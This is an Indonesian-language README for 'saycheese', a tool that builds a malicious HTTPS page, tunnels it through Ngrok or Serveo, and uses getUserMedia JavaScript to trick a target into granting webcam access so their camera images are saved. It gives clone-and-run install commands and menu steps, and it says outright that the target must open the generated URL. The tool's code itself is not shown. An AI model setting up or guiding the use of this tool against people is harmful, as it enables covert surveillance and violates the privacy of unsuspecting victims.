## Gimana bisa sih? Alat ini menghasilkan halaman HTTPS berbahaya menggunakan metode Serveo atau Ngrok Port Forwarding, dan kode javascript, untuk cam permintaan menggunakan MediaDevices.getUserMedia.
Metode MediaDevices.getUserMedia () meminta pengguna untuk izin untuk menggunakan input media yang menghasilkan MediaStream dengan trek yang berisi jenis media yang diminta. Aliran itu dapat mencakup, misalnya, trek video (diproduksi oleh perangkat keras atau sumber video virtual seperti kamera, perangkat perekaman video, layanan berbagi layar, dan sebagainya), trek audio (serupa, yang diproduksi oleh fisik atau sumber audio virtual seperti mikrofon, konverter A / D, atau sejenisnya), dan mungkin jenis trek lainnya.
Untuk meyakinkan target untuk memberikan izin untuk mengakses cam, halaman menggunakan kode javascript yang dibuat oleh https://github.com/wybiral yang mengubah favicon menjadi aliran cam.
Installation
Installing (Kali Linux/Mac):
$ apt update && upgrade / $ brew update && upgrade
$ apt install git / $ brew install git
$ git clone https://github.com/fajaragngn/saycheese
$ cd saycheese
$ bash saycheese.sh
Picture
*Pilih ngrok server
*Opsi (n) untuk memilih server secara otomatis
*Opsi (y) untuk memilih server secara manual
*target harus membuka url yang kita buat tadi, jika sudah file cam akan tersimpan